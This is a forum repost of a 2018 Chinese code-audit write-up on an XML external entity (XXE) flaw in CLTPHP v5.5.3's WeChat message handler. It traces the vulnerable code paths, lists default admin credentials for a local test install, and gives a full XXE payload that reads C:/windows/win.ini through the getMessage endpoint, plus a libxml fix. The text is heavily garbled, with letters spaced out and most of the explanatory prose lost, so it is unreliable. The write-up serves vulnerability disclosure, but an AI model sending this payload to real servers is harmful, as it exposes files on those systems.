搜索

[852] 2018-04-02_【代码审计】CLTPHP_v5.5.3前台XML外部实体注入漏洞

文档创建者:s7ckTeam
浏览次数:57
最后更新:2025-01-16
2018-04-02_【代码审计】CLTPHP_v5.5.3前台XML外部实体注入漏洞 0 0 0 1 0 2 C L T P H P _ v 5 . 5 . 3 X M L   B y p a s s   B y p a s s   2 0 1 8 - 0 4 - 0 2 C L T P H P T h i n k P H P L a y u i X M L s n 0 0 p y X M L C L T P H P h t t p : / / w w w . c l t p h p . c o m C L T P H P 5 . 5 . 3 h t t p s : / / g i t e e . c o m / c h i c h u / c l t p h p   h t t p : / / 1 2 7 . 0 . 0 . 1 / a d m i n / l o g i n / i n d e x . h t m l   a d m i n     a d m i n 1 2 3
0 3 1 / a p p / w c h a t / c o n t r o l l e r / W c h a t . p h p 1 0 0 - 1 3 3 f i l e _ g e t _ c o n t e n t s ( " p h p : / / i n p u t " )   X M L s i m p l e x m l _ l o a d _ s t r i n g X M L ? x m l $ p o s t O b j , M s g T y p e M s g T y p e = t e x t M s g T y p e T e x t 2 / a p p / w c h a t / c o n t r o l l e r / W c h a t . p h p   1 4 1 - 1 7 2 $ c o n t e n t S t r e v e n t _ k e y _ t e x t 3 / e x t e n d / c l t / W c h a t O a u t h . p h p   1 5 5 - 1 7 1 s p r i n t f 6 T o U s e r N a m e F r o m U s e r N a m e P a y l o a d
0 4 P a y l o d w i n . i n i P a u l o a d h t t p : / / 1 2 7 . 0 . 0 . 1 / w c h a t / w c h a t / g e t M e s s a g e . h t m l 1 .     < ? x m l   v e r s i o n = " 1 . 0 "   e n c o d i n g = " u t f - 8 " ? >     2 .     < ! D O C T Y P E   x x e   [ < ! E L E M E N T   n a m e   A N Y   > < ! E N T I T Y   x x e   S Y S T E M   " f i l e : / / / C : / w i n d o w s / w i n . i n i "   > ] >     3 .     < r o o t > < M s g T y p e > t e x t < / M s g T y p e >   < T o U s e r N a m e > & x x e ;   < / T o U s e r N a m e > < / r o o t >     使 P H P l i b x m l _ d i s a b l e _ e n t i t y _ l o a d e r ( t r u e ) ; X M L   < ! D O C T Y P E < ! E N T I T Y S Y S T E M P U B L I C B y p a s s A b o u t   M e W A F
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理